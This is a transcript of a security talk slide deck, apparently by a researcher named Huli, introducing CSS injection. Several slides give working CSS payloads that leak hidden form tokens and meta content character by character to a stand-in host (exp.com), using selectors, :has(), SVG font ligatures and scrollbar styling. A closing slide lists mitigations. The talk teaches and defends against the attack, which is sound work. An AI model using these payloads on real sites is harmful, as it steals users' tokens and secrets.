Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Attacking web without JS - CSS injection

Huli
September 22, 2022

Attacking web without JS - CSS injection

When speaking of web security in front-end, XSS is the first thing that comes to mind. But, even without JavaScript, the attacker can still use other attack vectors like HTML injection and CSS injection! This talk is an introduction to CSS injection.

Huli

September 22, 2022
Tweet

More Decks by Huli

Other Decks in Programming

Transcript

  1. About Huli • Security Researcher at Cymetrics / OneInfinity •

    CTF player at Water Paddler • https://blog.huli.tw/
  2. Steal input value <form> <input type=hidden name=token value=abc123> <input name="action"

    value="update"> <input type="submit"> </form> input[value^="a"]{ background: url("//exp.com?a"); }
  3. Steal input value <form> <input type=hidden name=token value=abc123> <input name="action"

    value="update"> <input type="submit"> </form> input[value^="a"] + input { background: url("//exp.com?a"); }
  4. has: to the rescue <form> <input name="action" value="update"> <input type="submit">

    <input type=hidden name=token value=abc123> </form> form:has(input[value^="a"]) { background: url("//exp.com?a"); }
  5. Steal meta content <head> <meta name=token content=abc123> </head> meta {

    display: block; } meta[content^="a"] { background: url(//exp.com?a); }
  6. Steal meta content <head> <meta name=token content=abc123> </head> meta {

    display: block; } meta[content^="a"] { background: url(//exp.com?a); }
  7. Steal meta content <head> <meta name=token content=abc123> </head> meta, head

    { display: block; } meta[content^="a"] { background: url(//exp.com?a); }
  8. ligature <svg> <defs> <font horiz-adv-x="0"> <font-face font-family="leak" units-per-em="1000" /> <glyph

    unicode="&quot;a" horiz-adv-x="10000" d="M1 0z"/> </font> </defs> </svg>
  9. ligature + scroll bar script { width: 300px; display: block;

    font-family: "leak"; white-space: nowrap; overflow-x: auto; } script::-webkit-scrollbar { background: blue; } script::-webkit-scrollbar:horizontal { background: url(https://exp.com?a); }
  10. Mitigation • Sanitization • Content Security Policy • style-src •

    font-src • Check origin/referer header • Same-site cookie
  11. Q&A